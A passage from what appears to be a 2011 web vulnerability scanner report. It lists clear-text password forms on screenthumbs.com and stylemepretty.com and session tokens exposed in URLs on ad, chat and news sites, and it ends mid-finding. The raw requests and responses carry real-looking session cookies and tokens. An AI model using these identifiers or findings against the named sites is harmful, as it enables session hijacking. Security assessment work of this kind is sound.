<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.54. http://www.screenthumbs.com/contact

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /contact

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /contact HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="50be459549d21d9341fab3fe0b1d0200" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.55. http://www.screenthumbs.com/forgot

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /forgot

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /forgot HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="b00dd68db5285da7172bb1920113859c" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.56. http://www.screenthumbs.com/linkthumbs

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /linkthumbs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /linkthumbs HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="65a86646a8217df0f2ef44a7bb955261" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.57. http://www.screenthumbs.com/plugins

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /plugins

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /plugins HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="1ce092655c1c5cc94b8f807b8f5a51ec" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.58. http://www.screenthumbs.com/service

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /service

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /service HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="ff365bee989fba6cf76abee1404951ea" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.59. http://www.screenthumbs.com/signup

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /signup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /signup HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:53:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br />
<form name="signup" id="signup" action="/signup.php" method="post"><input type="hidden" name="signup_token" id="signup_token" value="53807e321727ceff4a6d8722a59e99fe" />
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password" id="password" /></td>
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password2" id="password2" /></td>
...[SNIP]...

6.60. http://www.screenthumbs.com/signup.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /signup.php HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br />
<form name="signup" id="signup" action="/signup.php" method="post"><input type="hidden" name="signup_token" id="signup_token" value="f34de5585b9231b896e79b7faac5fb1a" />
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password" id="password" /></td>
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password2" id="password2" /></td>
...[SNIP]...

6.61. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<div id="sign-in">
<form method="post" action="http://circle.stylemepretty.com/wp-login.php">
<input type="submit" value="Log In" id="log-in" name="wp-submit" />
...[SNIP]...
<input type="text" name="log" id="sign-in-username" />
<input type="password" name="pwd" id="sign-in-password" />
<input type="submit" value="Go" id="sign-in-btn" />
...[SNIP]...

7. Session token in URL
There are 9 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. http://base.liveperson.net/hc/5296924/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:06:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


7.2. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:06:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: HumanClickCHATKEY=3761611791040242971; path=/hc/5296924; secure
Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


7.3. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

7.4. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

7.5. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

7.6. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

7.7. http://raw.oggifinogi.com/Track.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://raw.oggifinogi.com
Path:   /Track.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /Track.aspx?playlistId=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&site=www.bostonherald.com&eventType=9&sessionId=96da82a9_fbdc_477a_8a8f_5f6e210ee338&data=Flash%20Version%3A10.1%20r103 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

7.8. http://www.bostonherald.com/entertainment/movies/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /entertainment/movies/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
